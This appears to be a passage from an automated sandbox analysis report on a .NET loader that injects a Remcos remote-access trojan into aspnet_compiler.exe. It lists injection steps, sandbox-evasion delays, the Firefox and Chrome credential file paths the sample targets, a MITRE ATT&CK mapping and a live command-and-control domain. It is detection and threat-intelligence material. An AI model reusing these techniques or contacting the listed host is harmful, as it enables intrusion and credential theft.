              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004322512_2_00432251
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004263512_2_00426351
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041C46D2_2_0041C46D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004264BA2_2_004264BA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004366032_2_00436603
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0043C76D2_2_0043C76D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004257192_2_00425719
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004347312_2_00434731
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004358BA2_2_004358BA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004529D92_2_004529D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0043C99C2_2_0043C99C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041DA052_2_0041DA05
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00436A382_2_00436A38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00444AF02_2_00444AF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0043CBCB2_2_0043CBCB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00451BAB2_2_00451BAB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00425CA82_2_00425CA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00435DB62_2_00435DB6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0043CE282_2_0043CE28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0043307B appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00402073 appears 50 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00433700 appears 54 times
              Source: file.exeStatic PE information: No import functions for PE file found
              Source: file.exeBinary or memory string: OriginalFilename vs file.exe
              Source: file.exe, 00000001.00000002.554923464.0000018FF8B19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
              Source: file.exe, 00000001.00000002.555430907.0000018FF8E60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCEMENT.dll. vs file.exe
              Source: file.exe, 00000001.00000002.550087026.0000018F8008D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCEMENT.dll. vs file.exe
              Source: file.exeBinary or memory string: OriginalFilenameNBB872.exe. vs file.exe
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: file.exeReversingLabs: Detection: 24%
              Source: file.exeVirustotal: Detection: 32%
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00416840 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_00416840
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.logJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@3/1@68/1
              Source: file.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
              Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004195A5 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_004195A5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040E991 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle,2_2_0040E991
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-B0VP4N
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041A003 FindResourceA,LoadResource,LockResource,SizeofResource,2_2_0041A003
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: CEMENT.pdb source: file.exe, 00000001.00000002.555430907.0000018FF8E60000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000001.00000002.550087026.0000018F8008D000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: NBB872.pdb source: file.exe

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: file.exe, A/cfe605753591ecefb0de5afddfaa74037.cs.Net Code: c1675bf00bf077c2c9cbaa9d027c7d40f System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00456328 push eax; ret 2_2_00456346
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0045C51D push esi; ret 2_2_0045C526
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00433746 push ecx; ret 2_2_00433759
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00455A06 push ecx; ret 2_2_00455A19
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041B4C9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_0041B4C9
              Source: initial sampleStatic PE information: section name: .text entropy: 7.966829562881022
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00406524 ShellExecuteW,URLDownloadToFileW,2_2_00406524
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004195A5 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_004195A5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041B4C9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_0041B4C9
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Delayed program exit found
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040ECEA Sleep,ExitProcess,2_2_0040ECEA
              Source: C:\Users\user\Desktop\file.exe TID: 3300Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,2_2_004192A3
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 8.9 %
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0044D0F9 FindFirstFileExA,2_2_0044D0F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040B0AA FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040B2B1 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040B2B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00418650 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00418650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040B8C7 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040B8C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00408909 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00408909
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041AC0A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041AC0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00408D1B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00408D1B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00407E80 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_00407E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00406EB0 FindFirstFileW,FindNextFileW,2_2_00406EB0
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040730B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_0040730B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI call chain: ExitProcess graph end nodegraph_2-47741
              Source: aspnet_compiler.exe, 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00433304 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00433304
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041B4C9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_0041B4C9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00411241 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,2_2_00411241
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00441B85 mov eax, dword ptr fs:[00000030h]2_2_00441B85
              Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00433452 SetUnhandledExceptionFilter,2_2_00433452
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00433304 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00433304
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0043A3F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0043A3F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004338CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_004338CC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 457000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46F000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 475000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 477000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47C000Jump to behavior
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 10E4008Jump to behavior
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe2_2_0041163A
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00418186 mouse_event,2_2_00418186
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,2_2_0044716D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_00450558
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,2_2_004507D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,2_2_0045081B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,2_2_004508B6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00450943
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,2_2_00450B93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,2_2_00446C84
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00450CBC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,2_2_00450DC3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoA,2_2_0040EE14
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00450E90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0043354D cpuid 2_2_0043354D
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00404F31 GetLocalTime,CreateEventA,CreateThread,2_2_00404F31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00447A10 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,2_2_00447A10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041A168 GetUserNameW,2_2_0041A168

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\2_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \key3.db2_2_0040B0AA
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_0040AF8C

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: cmd.exe2_2_0040567A

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Native API              		1
              Windows Service              		1
              Bypass User Access Control              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		Exfiltration Over Other Network Medium11
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		1
              Deobfuscate/Decode Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol11
              Input Capture              		Exfiltration Over Bluetooth2
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts2
              Service Execution              		Logon Script (Windows)1
              Windows Service              		3
              Obfuscated Files or Information              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares12
              Clipboard Data              		Automated Exfiltration1
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)321
              Process Injection              		12
              Software Packing              		NTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer21
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Bypass User Access Control              		LSA Secrets33
              System Information Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Masquerading              		Cached Domain Credentials21
              Security Software Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items21
              Virtualization/Sandbox Evasion              		DCSync21
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem1
              Process Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)321
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
              Remote System Discovery              		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe24%ReversingLabsByteCode-MSIL.Trojan.Generic
              file.exe32%VirustotalBrowse
              file.exe100%AviraHEUR/AGEN.1326434
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              pekonomia.duckdns.org7%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://geoplugin.net/json.gp0%URL Reputationsafe
